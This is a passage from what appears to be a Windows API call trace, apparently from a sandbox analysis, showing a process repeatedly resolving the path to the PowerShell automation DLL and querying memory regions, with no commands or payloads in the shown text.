lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] VirtualQuery (in: lpAddress=0x25d0a4, lpBuffer=0x25e0a4, dwLength=0x1c | out: lpBuffer=0x25e0a4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da98, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da48, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.630] GetLastError () returned 0x0 [0044.630] VirtualQuery (in: lpAddress=0x25d0a4, lpBuffer=0x25e0a4, dwLength=0x1c | out: lpBuffer=0x25e0a4*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.631] GetLastError () returned 0x0 [0044.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.631] GetLastError () returned 0x0 [0044.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.631] GetLastError () returned 0x0 [0044.631] VirtualQuery (in: lpAddress=0x25ccd4, lpBuffer=0x25dcd4, dwLength=0x1c | out: lpBuffer=0x25dcd4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25cd10, lpBuffer=0x25dd10, dwLength=0x1c | out: lpBuffer=0x25dd10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.631] VirtualQuery (in: lpAddress=0x25ce7c, lpBuffer=0x25de7c, dwLength=0x1c | out: lpBuffer=0x25de7c*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.632] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.632] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.632] VirtualQuery (in: lpAddress=0x25cfd8, lpBuffer=0x25dfd8, dwLength=0x1c | out: lpBuffer=0x25dfd8*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.632] VirtualQuery (in: lpAddress=0x25d014, lpBuffer=0x25e014, dwLength=0x1c | out: lpBuffer=0x25e014*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.632] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0xdd752d5f, Data2=0x2c82, Data3=0x400b, Data4=([0]=0xaf, [1]=0xd, [2]=0xbd, [3]=0xdc, [4]=0xc4, [5]=0x8a, [6]=0xd3, [7]=0x87))) returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.632] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.633] GetLastError () returned 0x0 [0044.633] VirtualQuery (in: lpAddress=0x25ccd4, lpBuffer=0x25dcd4, dwLength=0x1c | out: lpBuffer=0x25dcd4*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.634] VirtualQuery (in: lpAddress=0x25cd10, lpBuffer=0x25dd10, dwLength=0x1c | out: lpBuffer=0x25dd10*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] VirtualQuery (in: lpAddress=0x25cddc, lpBuffer=0x25dddc, dwLength=0x1c | out: lpBuffer=0x25dddc*(BaseAddress=0x25c000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25da74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] CoCreateGuid (in: pguid=0x25e388 | out: pguid=0x25e388*(Data1=0x974d6b83, Data2=0x19e4, Data3=0x442c, Data4=([0]=0xba, [1]=0x22, [2]=0xf, [3]=0x55, [4]=0xa9, [5]=0x22, [6]=0xcb, [7]=0x36))) returned 0x0 [0044.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dc30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0044.634] GetLastError () returned 0x0 [0044.634] GetFullPathNameW (in: 